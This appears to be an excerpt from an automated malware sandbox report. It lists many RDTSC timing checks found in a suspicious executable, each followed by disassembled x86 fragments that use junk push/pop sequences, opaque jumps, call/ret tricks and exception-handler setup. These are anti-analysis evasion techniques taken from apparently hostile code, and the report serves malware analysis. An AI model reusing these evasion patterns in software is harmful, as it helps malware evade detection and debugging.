Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E93C8D second address: E93C98 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E93C98 second address: E93CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB16CB2DB76h 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB16CB2DB86h 0x00000016 jo 00007FB16CB2DB76h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E93CC5 second address: E93CC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E93CC9 second address: E93CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB16CB2DB7Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E93CD9 second address: E93CDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E93CDE second address: E93CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E93E5A second address: E93E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E93E5E second address: E93E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB16CB2DB7Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB16CB2DB88h 0x00000012 je 00007FB16CB2DB76h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E93E93 second address: E93EA3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB16D386886h 0x00000008 jnc 00007FB16D386886h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E93FD9 second address: E93FE9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB16CB2DB76h 0x00000008 jnl 00007FB16CB2DB76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E9456B second address: E94591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FB16D386899h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E94591 second address: E945A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB16CB2DB80h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E947FF second address: E94822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB16D386893h 0x00000009 jmp 00007FB16D38688Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E94822 second address: E94855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB16CB2DB86h 0x00000009 jmp 00007FB16CB2DB89h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E94855 second address: E94871 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB16D386886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB16D386890h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E5EBB0 second address: E5EBC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jmp 00007FB16CB2DB7Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E949E4 second address: E949EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E949EA second address: E94A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB16CB2DB7Fh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E94A00 second address: E94A26 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB16D386896h 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FB16D386886h 0x00000010 jns 00007FB16D386886h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E950F8 second address: E950FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E950FC second address: E9511F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB16D386899h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E9511F second address: E95149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB16CB2DB7Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB16CB2DB7Bh 0x00000010 popad 0x00000011 jnp 00007FB16CB2DB90h 0x00000017 push eax 0x00000018 push edx 0x00000019 jns 00007FB16CB2DB76h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E95415 second address: E95419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E988A2 second address: E988A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E988A8 second address: E988AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E989A6 second address: E989AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E989AC second address: E989B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E9C411 second address: E9C47D instructions: 0x00000000 rdtsc 0x00000002 js 00007FB16CB2DB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FB16CB2DB88h 0x00000010 jmp 00007FB16CB2DB83h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB16CB2DB82h 0x0000001d jnl 00007FB16CB2DB92h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E9C47D second address: E9C482 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E6BFFD second address: E6C011 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16CB2DB7Ah 0x00000007 jnc 00007FB16CB2DB76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA2672 second address: EA2676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA2676 second address: EA2696 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB16CB2DB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB16CB2DB84h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA27E5 second address: EA27EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA27EB second address: EA27EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA27EF second address: EA2848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB16D386899h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FB16D386891h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB16D386897h 0x00000021 jg 00007FB16D386886h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA2848 second address: EA2858 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB16CB2DB76h 0x00000008 js 00007FB16CB2DB76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA2B47 second address: EA2B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA2B4C second address: EA2B59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FB16CB2DB76h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA2E2A second address: EA2E44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D386896h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA2E44 second address: EA2E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA2E4D second address: EA2E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA2E57 second address: EA2E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA2E62 second address: EA2E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA2FBC second address: EA2FC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA2FC5 second address: EA2FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA2FCC second address: EA2FD1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA3960 second address: EA3966 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA3A28 second address: EA3A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA3A2D second address: EA3A33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA3A33 second address: EA3A94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16CB2DB81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FB16CB2DB81h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 jg 00007FB16CB2DB83h 0x0000001c jmp 00007FB16CB2DB87h 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA3A94 second address: EA3A9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA3A9A second address: EA3AA4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB16CB2DB7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA4169 second address: EA416F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA416F second address: EA4175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA4624 second address: EA4628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA48A8 second address: EA48AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA48AE second address: EA48B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA498E second address: EA49A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16CB2DB7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA4A88 second address: EA4A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA4B19 second address: EA4B40 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB16CB2DB89h 0x00000008 jmp 00007FB16CB2DB83h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 cld 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA4B40 second address: EA4B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA4B44 second address: EA4B56 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB16CB2DB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FB16CB2DB76h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA59D2 second address: EA59DC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB16D38688Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA8013 second address: EA802B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16CB2DB7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA802B second address: EA80A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FB16D386888h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 jmp 00007FB16D38688Ah 0x00000027 push 00000000h 0x00000029 cld 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007FB16D386888h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 mov esi, 6DD5EB05h 0x0000004b xchg eax, ebx 0x0000004c jl 00007FB16D3868A1h 0x00000052 pushad 0x00000053 jmp 00007FB16D386893h 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA80A8 second address: EA80C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jo 00007FB16CB2DB90h 0x0000000c pushad 0x0000000d jmp 00007FB16CB2DB82h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EA961D second address: EA9621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EAA9E5 second address: EAA9FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16CB2DB85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EAA9FE second address: EAAA03 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB3AC5 second address: EB3B0D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB16CB2DB7Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, edx 0x0000000f push 00000000h 0x00000011 jno 00007FB16CB2DB8Fh 0x00000017 push 00000000h 0x00000019 sbb di, 0900h 0x0000001e mov ebx, dword ptr [ebp+122D38F1h] 0x00000024 xchg eax, esi 0x00000025 push edx 0x00000026 push ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB580C second address: EB5822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB16D386891h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB164D second address: EB1651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB3C58 second address: EB3C5E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB5822 second address: EB5866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FB16CB2DB78h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov di, dx 0x00000025 mov dword ptr [ebp+1245B7F7h], esi 0x0000002b push 00000000h 0x0000002d jg 00007FB16CB2DB7Ch 0x00000033 push 00000000h 0x00000035 cmc 0x00000036 xchg eax, esi 0x00000037 push edx 0x00000038 push ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB1651 second address: EB165F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FB16D38688Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB3C5E second address: EB3D0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16CB2DB81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007FB16CB2DB86h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FB16CB2DB78h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b pushad 0x0000002c mov ebx, dword ptr [ebp+122D2D32h] 0x00000032 sub dword ptr [ebp+124545A0h], edi 0x00000038 popad 0x00000039 push dword ptr fs:[00000000h] 0x00000040 sub dword ptr [ebp+122D1E60h], esi 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d push 00000000h 0x0000004f push ebp 0x00000050 call 00007FB16CB2DB78h 0x00000055 pop ebp 0x00000056 mov dword ptr [esp+04h], ebp 0x0000005a add dword ptr [esp+04h], 00000015h 0x00000062 inc ebp 0x00000063 push ebp 0x00000064 ret 0x00000065 pop ebp 0x00000066 ret 0x00000067 mov ebx, esi 0x00000069 mov eax, dword ptr [ebp+122D0A91h] 0x0000006f je 00007FB16CB2DB78h 0x00000075 mov ebx, edx 0x00000077 xor ebx, 23EA3334h 0x0000007d push FFFFFFFFh 0x0000007f jno 00007FB16CB2DB76h 0x00000085 nop 0x00000086 pushad 0x00000087 pushad 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB165F second address: EB170B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 movsx ebx, cx 0x0000000b push dword ptr fs:[00000000h] 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FB16D386888h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c mov edi, 33B6C945h 0x00000031 mov bx, C6B2h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c jmp 00007FB16D386895h 0x00000041 mov eax, dword ptr [ebp+122D146Dh] 0x00000047 or ebx, 1C359C80h 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push edx 0x00000052 call 00007FB16D386888h 0x00000057 pop edx 0x00000058 mov dword ptr [esp+04h], edx 0x0000005c add dword ptr [esp+04h], 00000017h 0x00000064 inc edx 0x00000065 push edx 0x00000066 ret 0x00000067 pop edx 0x00000068 ret 0x00000069 jns 00007FB16D38688Ch 0x0000006f nop 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FB16D386898h 0x00000077 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB3D0D second address: EB3D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB59B9 second address: EB59D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB16D386895h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB170B second address: EB1715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB16CB2DB76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB3D13 second address: EB3D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB16D386897h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EB1715 second address: EB1728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FB16CB2DB78h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
